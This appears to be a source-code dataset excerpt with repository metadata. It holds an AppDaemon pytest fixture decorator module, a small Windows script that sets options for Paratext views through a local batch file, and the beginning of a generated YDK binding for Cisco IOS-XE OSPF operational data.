ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks) return automation_fixture_with_initialisation def _generate_id(self, automation_classes): return automation_classes.__name__ class _AutomationFixtureDecoratorWithArgs: def __init__(self, automation_classes_with_args): self.automation_classes_with_args = automation_classes_with_args for automation, _args in self.automation_classes_with_args: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param[0] automation_args = request.param[1] automation = _instantiate_and_initialize_automation( function, automation_class, given_that, hass_functions, hass_mocks) return (automation, automation_args) return automation_fixture_with_initialisation def _generate_id(self, automation_classes_with_args): return automation_classes_with_args[0].__name__ def automation_fixture(*args): """ Decorator to seamlessly initialize and inject an automation fixture 4 Versions: - Single Class: @automation_fixture(MyAutomation) - Multiple Classes: @automation_fixture(MyAutomation, MyOtherAutomation) - Single Class w/ params: @automation_fixture((upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'})) - Multiple Classes w/ params: @automation_fixture( (upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'}), (upstairs.Bathroom, {'motion': 'binary_sensor.bathroom_motion'}), ) When multiple classes are passed, tests will be generated for each automation. When using parameters, the injected object will be a tuple: `(Initialized_Automation, params)` # Pre-initialization setup All code in the `@automation_fixture` function will be executed before initializing the `automation_class` 3 fixtures are injectable in `@automation_fixture`: 'given_that', 'hass_mocks' and 'hass_functions' 'hass_functions' is deprecated in favor of 'hass_mocks' Examples: ```python @automation_fixture(Bathroom) def bathroom(): pass # -> `Bathroom` automation will be initialized and available in tests as `bathroom` --- @automation_fixture(Bathroom) def bathroom(given_that): given_that.time_is(time(hour=13)) # -> 1. `given_that.time_is(time(hour=13))` will be called # -> 2. `Bathroom` automation will be initialized and available in tests as `bathroom` ``` Do not return anything, any returned object will be ignored """ if not args or isfunction(args[0]): raise AutomationFixtureError( 'Do not forget to pass the automation class(es) as argument') if type(args[0]) is not tuple: automation_classes = args return _AutomationFixtureDecoratorWithoutArgs(automation_classes) else: automation_classes_with_args = args return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
38.844444
149
0.707809
import warnings from inspect import isfunction, signature import pkg_resources import pytest from appdaemon.plugins.hass.hassapi import Hass from appdaemontestframework.common import AppdaemonTestFrameworkError class AutomationFixtureError(AppdaemonTestFrameworkError): pass def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks): _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks) automation = automation_class( None, automation_class.__name__, None, None, None, None, None ) automation.initialize() given_that.mock_functions_are_cleared() return automation def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks): injectable_fixtures = { 'given_that': given_that, 'hass_functions': hass_functions, 'hass_mocks': hass_mocks, } def _check_valid(param): if param not in injectable_fixtures: raise AutomationFixtureError( f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}") if param == 'hass_functions': warnings.warn( """ Injecting `hass_functions` into automation fixtures is deprecated. Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions` """, DeprecationWarning) args = [] for param in signature(function).parameters: _check_valid(param) args.append(injectable_fixtures.get(param)) function(*tuple(args)) def ensure_automation_is_valid(automation_class): def function_exist_in_automation_class(func_name): return func_name in dir(automation_class) def function_has_arguments_other_than_self(func_name): func_parameters = signature(getattr(automation_class, func_name)).parameters return list(func_parameters.keys()) != ["self"] def __init___was_overridden(): return '__init__' in automation_class.__dict__ def not_subclass_of_Hass(): return not issubclass(automation_class, Hass) if not function_exist_in_automation_class('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!") if function_has_arguments_other_than_self('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!") if __init___was_overridden(): raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'") if not_subclass_of_Hass(): raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'") class _AutomationFixtureDecoratorWithoutArgs: def __init__(self, automation_classes): self.automation_classes = automation_classes for automation in self.automation_classes: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks) return automation_fixture_with_initialisation def _generate_id(self, automation_classes): return automation_classes.__name__ class _AutomationFixtureDecoratorWithArgs: def __init__(self, automation_classes_with_args): self.automation_classes_with_args = automation_classes_with_args for automation, _args in self.automation_classes_with_args: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param[0] automation_args = request.param[1] automation = _instantiate_and_initialize_automation( function, automation_class, given_that, hass_functions, hass_mocks) return (automation, automation_args) return automation_fixture_with_initialisation def _generate_id(self, automation_classes_with_args): return automation_classes_with_args[0].__name__ def automation_fixture(*args): if not args or isfunction(args[0]): raise AutomationFixtureError( 'Do not forget to pass the automation class(es) as argument') if type(args[0]) is not tuple: automation_classes = args return _AutomationFixtureDecoratorWithoutArgs(automation_classes) else: automation_classes_with_args = args return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
true
true
f705aa88a1c1f1199101a25efeea9d789667e79f
587
py
Python
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
# Show TNDD Views for Paratext # Written by Ian McQuay, SIL International, 2022-01-05+10:00 # Import OS to be able to output correctly to Windows import os # Define batch files actionbatchfile = "C:\Users\Public\PT-Views\user-views-action.cmd" batchfile = "C:\Users\Public\PT-Views\user-views-manager.cmd" # setup variables for the ACTION batch file. commandstring = "echo set action=show> " + actionbatchfile os.system(commandstring) commandstring = "echo set matchstart=TNDD>> " + actionbatchfile os.system(commandstring) # Run the batch file to do the action os.startfile(batchfile)
36.6875
66
0.773424
import os actionbatchfile = "C:\Users\Public\PT-Views\user-views-action.cmd" batchfile = "C:\Users\Public\PT-Views\user-views-manager.cmd" commandstring = "echo set action=show> " + actionbatchfile os.system(commandstring) commandstring = "echo set matchstart=TNDD>> " + actionbatchfile os.system(commandstring) os.startfile(batchfile)
false
true
f705aabf435e5694deac5786cce3a35968d77640
805,471
py
Python
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
177
2016-03-15T17:03:51.000Z
2022-03-18T16:48:44.000Z
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
18
2016-03-30T10:45:22.000Z
2020-07-14T16:28:13.000Z
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
85
2016-03-16T20:38:57.000Z
2022-02-22T04:26:02.000Z
""" Cisco_IOS_XE_ospf_oper This module contains a collection of YANG definitions for monitoring the operation of ospf protocol in a Network Element. Copyright (c) 2016\-2018 by Cisco Systems, Inc. All rights reserved. """ from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class AddressFamily(Enum): """ AddressFamily (Enum Class) Address family type .. data:: address_family_ipv4 = 0 .. data:: address_family_ipv6 = 1 """ address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4") address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6") class NbrStateType(Enum): """ NbrStateType (Enum Class) OSPF neighbor state type .. data:: ospf_nbr_down = 1 Neighbor state down .. data:: ospf_nbr_attempt = 2 Neighbor attempt state .. data:: ospf_nbr_init = 3 Neighbor init state .. data:: ospf_nbr_two_way = 4 Neighbor 2-way state .. data:: ospf_nbr_exchange_start = 5 Neighbor exchange start state .. data:: ospf_nbr_exchange = 6 Neighbor exchange state .. data:: ospf_nbr_loading = 7 Neighbor loading state .. data:: ospf_nbr_full = 8 Neighbor full state """ ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down") ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt") ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init") ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way") ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start") ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange") ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading") ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full") class OspfAuthType(Enum): """ OspfAuthType (Enum Class) OSPF Authentication type .. data:: ospf_auth_ipsec = 0 .. data:: ospf_auth_trailer_keychain = 1 .. data:: ospf_auth_trailer_key = 2 .. data:: ospf_auth_type_none = 3 """ ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec") ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain") ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key") ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none") class OspfExternalMetricType(Enum): """ OspfExternalMetricType (Enum Class) External metric type .. data:: ospf_ext_metric_type_1 = 0 .. data:: ospf_ext_metric_type_2 = 1 """ ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1") ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2") class OspfNetworkType(Enum): """ OspfNetworkType (Enum Class) OSPF network type .. data:: ospf_broadcast = 0 OSPF broadcast multi-access network .. data:: ospf_non_broadcast = 1 OSPF Non-Broadcast Multi-Access (NBMA) network .. data:: ospf_point_to_multipoint = 2 OSPF point-to-multipoint network .. data:: ospf_point_to_point = 3 OSPF point-to-point network """ ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast") ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast") ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint") ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point") class OspfOperationMode(Enum): """ OspfOperationMode (Enum Class) OSPF operational mode .. data:: ospf_ships_in_the_night = 0 Ships-in-the-night operation mode in which each OSPF instance carries only one address family """ ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night") class Ospfv2AuthTypeSelection(Enum): """ Ospfv2AuthTypeSelection (Enum Class) The authentication type .. data:: ospfv2_auth_none = 0 No authentication configured .. data:: ospfv2_auth_trailer_key = 1 Authentication uses the trailer key .. data:: ospfv2_auth_trailer_key_chain = 2 Authentication uses a trailer key chain """ ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none") ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key") ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain") class Ospfv2CryptoAlgorithm(Enum): """ Ospfv2CryptoAlgorithm (Enum Class) The algorithm in use .. data:: ospfv2_crypto_cleartest = 0 The OSPFv2 authentication is sent as cleartext .. data:: ospfv2_crypto_md5 = 1 The OSPFv2 authentication is encrypted using Message Digest 5 """ ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest") ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5") class Ospfv2IntfState(Enum): """ Ospfv2IntfState (Enum Class) The possible states that an interface can be in .. data:: ospfv2_interface_state_down = 0 The interface is in the down state .. data:: ospfv2_interface_state_loopback = 1 The interface is in loopback state .. data:: ospfv2_interface_state_waiting = 2 The interface is in waiting state .. data:: ospfv2_interface_state_point_to_mpoint = 3 The interface is in point-to-multipoint state .. data:: ospfv2_interface_state_point_to_point = 4 The interface is in point-to-point state .. data:: ospfv2_interface_state_dr = 5 The interface is in the designated router state .. data:: ospfv2_interface_state_backup = 6 The interface is providing backup for another interface .. data:: ospfv2_interface_state_other = 7 The interface is in a state other than the ones nummerated in this list """ ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down") ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback") ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting") ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint") ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point") ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr") ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup") ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other") class Ospfv2LsaType(Enum): """ Ospfv2LsaType (Enum Class) Link State Advertisement type .. data:: ospfv2_lsa_type_unsupported_lsa_type = 0 .. data:: ospfv2_lsa_type_router = 1 .. data:: ospfv2_lsa_type_network = 2 .. data:: ospfv2_lsa_type_summary_net = 3 .. data:: ospfv2_lsa_type_summary_router = 4 .. data:: ospfv2_lsa_type_as_external = 5 .. data:: ospfv2_lsa_type_nssa = 6 .. data:: ospfv2_lsa_type_link_scope_opaque = 7 .. data:: ospfv2_lsa_type_area_scope_opaque = 8 .. data:: ospfv2_lsa_type_as_scope_opaque = 9 """ ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type") ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router") ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network") ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net") ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router") ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external") ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa") ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque") ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque") ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque") class OspfOperData(Entity): """ Operational state of ospf .. attribute:: ospf_state OSPF operational state **type**\: :py:class:`OspfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState>` **presence node**\: True **config**\: False .. attribute:: ospfv2_instance The OSPF instance **type**\: list of :py:class:`Ospfv2Instance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData, self).__init__() self._top_entity = None self.yang_name = "ospf-oper-data" self.yang_parent_name = "Cisco-IOS-XE-ospf-oper" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))]) self._leafs = OrderedDict() self.ospf_state = None self._children_name_map["ospf_state"] = "ospf-state" self.ospfv2_instance = YList(self) self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData, [], name, value) class OspfState(Entity): """ OSPF operational state .. attribute:: op_mode OSPF operation mode **type**\: :py:class:`OspfOperationMode <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperationMode>` **config**\: False .. attribute:: ospf_instance OSPF routing protocol instance **type**\: list of :py:class:`OspfInstance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance>` **config**\: False This class is a :ref:`presence class<presence-class>` """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState, self).__init__() self.yang_name = "ospf-state" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))]) self.is_presence_container = True self._leafs = OrderedDict([ ('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])), ]) self.op_mode = None self.ospf_instance = YList(self) self._segment_path = lambda: "ospf-state" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value) class OspfInstance(Entity): """ OSPF routing protocol instance .. attribute:: af (key) Address\-family of the instance **type**\: :py:class:`AddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.AddressFamily>` **config**\: False .. attribute:: router_id (key) Defined in RFC 2328. A 32\-bit number that uniquely identifies the router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospf_area List of ospf areas **type**\: list of :py:class:`OspfArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea>` **config**\: False .. attribute:: link_scope_lsas List OSPF link scope LSA **type**\: list of :py:class:`LinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas>` **config**\: False .. attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.MultiTopology>` **config**\: False .. attribute:: process_id The process identifier used to refer to this instance **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance, self).__init__() self.yang_name = "ospf-instance" self.yang_parent_name = "ospf-state" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['af','router_id'] self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))]) self._leafs = OrderedDict([ ('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])), ]) self.af = None self.router_id = None self.process_id = None self.ospf_area = YList(self) self.link_scope_lsas = YList(self) self.multi_topology = YList(self) self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value) class OspfArea(Entity): """ List of ospf areas .. attribute:: area_id (key) OSPF area ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospf_interface List of OSPF interfaces **type**\: list of :py:class:`OspfInterface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface>` **config**\: False .. attribute:: area_scope_lsa List of OSPF area scope LSA **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__() self.yang_name = "ospf-area" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospf_interface = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value) class OspfInterface(Entity): """ List of OSPF interfaces .. attribute:: name (key) Interface name **type**\: str **config**\: False .. attribute:: network_type Network type **type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>` **config**\: False .. attribute:: passive Enable/Disable passive **type**\: bool **config**\: False .. attribute:: demand_circuit Enable/Disable demand circuit **type**\: bool **config**\: False .. attribute:: multi_area Multi Area **type**\: :py:class:`MultiArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea>` **config**\: False .. attribute:: static_neighbor Staticly configured neighbors **type**\: list of :py:class:`StaticNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor>` **config**\: False .. attribute:: node_flag Set prefix as a node representative prefix **type**\: bool **config**\: False .. attribute:: fast_reroute Fast reroute config **type**\: :py:class:`FastReroute <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute>` **config**\: False .. attribute:: cost Interface cost **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_interval Time between hello packets **type**\: int **range:** 0..65535 **config**\: False .. attribute:: dead_interval Interval after which a neighbor is declared dead **type**\: int **range:** 0..65535 **config**\: False .. attribute:: retransmit_interval Time between retransmitting unacknowledged Link State Advertisements (LSAs) **type**\: int **range:** 0..65535 **config**\: False .. attribute:: transmit_delay Estimated time needed to send link\-state update **type**\: int **range:** 0..65535 **config**\: False .. attribute:: mtu_ignore Enable/Disable ignoring of MTU in DBD packets **type**\: bool **config**\: False .. attribute:: lls Enable/Disable link\-local signaling (LLS) support **type**\: bool **config**\: False .. attribute:: prefix_suppression Suppress advertisement of the prefixes **type**\: bool **config**\: False .. attribute:: bfd Enable/disable bfd **type**\: bool **config**\: False .. attribute:: ttl_security TTL security **type**\: :py:class:`TtlSecurity <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity>` **config**\: False .. attribute:: enable Enable/disable protocol on the interface **type**\: bool **config**\: False .. attribute:: authentication Authentication configuration **type**\: :py:class:`Authentication <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication>` **config**\: False .. attribute:: state Interface state **type**\: str **config**\: False .. attribute:: hello_timer Hello timer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: wait_timer Wait timer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr Backup Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: ospf_neighbor List of OSPF neighbors **type**\: list of :py:class:`OspfNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor>` **config**\: False .. attribute:: intf_link_scope_lsas List OSPF link scope LSAs **type**\: list of :py:class:`IntfLinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas>` **config**\: False .. attribute:: intf_multi_topology OSPF interface topology **type**\: list of :py:class:`IntfMultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology>` **config**\: False .. attribute:: priority Configure OSPF router priority **type**\: int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__() self.yang_name = "ospf-interface" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])), ('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])), ('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('state', (YLeaf(YType.str, 'state'), ['str'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', 